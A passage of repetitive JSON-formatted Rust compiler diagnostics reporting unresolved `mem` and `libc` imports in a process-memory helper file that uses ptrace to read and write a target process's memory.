`libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `mem`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3911,"byte_end":3914,"line_start":123,"line_end":123,"column_start":29,"column_end":32,"is_primary":true,"text":[{"text":" let mut arr = [0u8; mem::size_of::()];","highlight_start":29,"highlight_end":32}],"label":"use of unresolved module or unlinked crate `mem`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this module","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::mem;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:123:29\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m123\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut arr = [0u8; mem::size_of::()];\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `mem`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `mem`, use `cargo add mem` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this module\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::mem;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":3926,"byte_end":3930,"line_start":123,"line_end":123,"column_start":44,"column_end":48,"is_primary":true,"text":[{"text":" let mut arr = [0u8; mem::size_of::()];","highlight_start":44,"highlight_end":48}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:123:44\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m123\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let mut arr = [0u8; mem::size_of::()];\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4011,"byte_end":4015,"line_start":125,"line_end":125,"column_start":19,"column_end":23,"is_primary":true,"text":[{"text":" let val = libc::c_long::from_ne_bytes(arr);","highlight_start":19,"highlight_end":23}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use std::os::raw::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null},{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use core::ffi::c_long;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null},{"message":"if you import `c_long`, refer to it directly","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":4011,"byte_end":4017,"line_start":125,"line_end":125,"column_start":19,"column_end":25,"is_primary":true,"text":[{"text":" let val = libc::c_long::from_ne_bytes(arr);","highlight_start":19,"highlight_end":25}],"label":null,"suggested_replacement":"","suggestion_applicability":"Unspecified","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:125:19\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let val = libc::c_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing one of these type aliases\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use std::os::raw::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use core::ffi::c_long;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: if you import `c_long`, refer to it directly\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;9m- \u001b[0m\u001b[0m let val = \u001b[0m\u001b[0m\u001b[38;5;9mlibc::\u001b[0m\u001b[0mc_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m125\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ \u001b[0m\u001b[0m let val = c_long::from_ne_bytes(arr);\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4099,"byte_end":4103,"line_start":127,"line_end":127,"column_start":38,"column_end":42,"is_primary":true,"text":[{"text":" let ptr = &val as *const libc::c_long as *mut libc::c_void;","highlight_start":38,"highlight_end":42}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:127:38\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m127\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &val as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4120,"byte_end":4124,"line_start":127,"line_end":127,"column_start":59,"column_end":63,"is_primary":true,"text":[{"text":" let ptr = &val as *const libc::c_long as *mut libc::c_void;","highlight_start":59,"highlight_end":63}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:127:59\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m127\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let ptr = &val as *const libc::c_long as *mut libc::c_void;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4184,"byte_end":4188,"line_start":128,"line_end":128,"column_start":51,"column_end":55,"is_primary":true,"text":[{"text":" ptrace::write(pid, start_addr as *mut libc::c_void, ptr)?;","highlight_start":51,"highlight_end":55}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:128:51\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m128\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m ptrace::write(pid, start_addr as *mut libc::c_void, ptr)?;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4565,"byte_end":4569,"line_start":138,"line_end":138,"column_start":73,"column_end":77,"is_primary":true,"text":[{"text":" let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };","highlight_start":73,"highlight_end":77}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing this crate","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use nix::libc;\n","suggestion_applicability":"MaybeIncorrect","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0433]\u001b[0m\u001b[0m\u001b[1m: failed to resolve: use of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/helper/processes.rs:138:73\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m138\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m let orig_word = unsafe { ptrace::read(pid, aligned_addr as *mut libc::c_void)? };\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9muse of unresolved module or unlinked crate `libc`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m= \u001b[0m\u001b[0m\u001b[1mhelp\u001b[0m\u001b[0m: if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;14mhelp\u001b[0m\u001b[0m: consider importing this crate\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m1\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[38;5;10m+ use nix::libc;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\n"}
+{"$message_type":"diagnostic","message":"failed to resolve: use of unresolved module or unlinked crate `libc`","code":{"code":"E0433","explanation":"An undeclared crate, module, or type was used.\n\nErroneous code example:\n\n```compile_fail,E0433\nlet map = HashMap::new();\n// error: failed to resolve: use of undeclared type `HashMap`\n```\n\nPlease verify you didn't misspell the type/module's name or that you didn't\nforget to import it:\n\n```\nuse std::collections::HashMap; // HashMap has been imported.\nlet map: HashMap = HashMap::new(); // So it can be used!\n```\n\nIf you've expected to use a crate name:\n\n```compile_fail\nuse ferris_wheel::BigO;\n// error: failed to resolve: use of undeclared module or unlinked crate\n```\n\nMake sure the crate has been added as a dependency in `Cargo.toml`.\n\nTo use a module from your current crate, add the `crate::` prefix to the path.\n"},"level":"error","spans":[{"file_name":"src/helper/processes.rs","byte_start":4706,"byte_end":4710,"line_start":141,"line_end":141,"column_start":24,"column_end":28,"is_primary":true,"text":[{"text":" let new_word = libc::c_long::from_ne_bytes(bytes);","highlight_start":24,"highlight_end":28}],"label":"use of unresolved module or unlinked crate `libc`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"if you wanted to use a crate named `libc`, use `cargo add libc` to add it to your `Cargo.toml`","code":null,"level":"help","spans":[],"children":[],"rendered":null},{"message":"consider importing one of these type aliases","code":null,"level":"help","spans":[{"file_name":"src/helper/processes.rs","byte_start":0,"byte_end":0,"line_start":1,"line_end":1,"column_start":1,"column_end":1,"is_primary":true,"text":[{"text":"use std::collections::HashMap;","highlight_start":1,"highlight_end":1}],"label":null,"suggested_replacement":"use 